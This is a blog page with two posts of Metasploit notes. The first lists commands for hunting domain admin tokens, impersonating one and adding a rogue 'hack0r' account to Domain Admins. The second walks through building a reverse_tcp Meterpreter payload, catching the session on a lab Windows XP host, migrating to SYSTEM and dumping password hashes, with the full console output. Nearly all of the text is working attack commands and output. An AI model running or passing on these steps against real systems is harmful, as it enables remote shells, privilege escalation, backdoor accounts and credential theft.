KinGBin’s Blog

2010
08.20

Hunting For Domain Admin Tokens ~ Jabra

Category: Main / Tag: metasploit / Comments Off

net groups “Domain Admins” /domain

msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

msf> sessions -i [session-with-domain-admin-token]

meterpreter> impersonate_token ‘COMPANY\joe-admin’
meterpreter> execute -f cmd.exe -H -c -i -t

C:\net user hack0r h4ck0r) /add /domain
C:\net group “Domain Admins” hack0r /add /domain

via: https://spl0it.wordpress.com/2009/12/15/hunting-for-domain-admin-tokens/

2010
02.08

Self Meterpreter Notes:

Category: Main / Tag: metaspoit / Comments Off

Using the new hashdump from HD MOORE thanks to pauldotcom:
msfpayload windows/meterpreter/reverse_tcp LHOST=d.d.d.d LPORT=d x > test.exe

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST d.d.d.d LHOST => d.d.d.d msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -j -z [*] Exploit running as background job. msf exploit(handler) > [*] Starting the payload handler... [*] Started reverse handler on port d

[*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (d.d.d.d:d -> d.d.d.d:49595) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: WINXPLAB01 OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > getuid Server username: WINXPLAB01\labuser meterpreter > shell Process 1088 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\labuser\Desktop>net localgroup administrators net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator labuser The command completed successfully. C:\Documents and Settings\labuser\Desktop>exit

meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:5b4834a4e5c2c97eab07a2c865fbcc3e:10362ac86d8a65482cc0010265605578::: labuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:067c11d22e8bc3e9b51d0f4eb2a5952a::: meterpreter >

meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669... [-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_create_key: Operation failed: 5 [-] This script requires the use of a SYSTEM user context (hint: migrate into service process) meterpreter >

/*migrate to a SYSTEM pid*/ meterpreter > migrate 1040 [*] Migrating to 1040... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 0015e47d4ba625a79b4a4b94cfccb669... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes...